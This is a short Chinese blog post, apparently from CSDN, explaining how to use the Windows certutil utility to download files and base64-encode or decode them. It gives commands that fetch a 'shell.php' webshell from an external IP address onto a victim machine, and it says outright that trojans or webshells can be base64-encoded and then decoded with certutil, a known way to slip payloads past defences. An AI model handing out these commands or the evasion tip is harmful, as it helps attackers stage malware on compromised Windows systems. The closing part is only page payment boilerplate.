certutil工具的用法

certutil

certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。

远程下载

certutil -urlcache -split -f http://114.118.80.138/shell.php  #下载文件到当前目录下
 
certutil -urlcache -split -f http://114.118.80.138/shell.php  c:/users/xie/desktop/shell.php        #下载文件到指定目录下

文件base64编码解码

将a.txt文件base64编码为b.txt
certutil -encode a.txt b.txt

将c.txt文件base64解码为c.txt
certutil -decode b.txt c.txt

所以可以将木马base64编码后再解码。这里的木马可以是exe木马或者是webshell等任何文件均可。

相关推荐
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值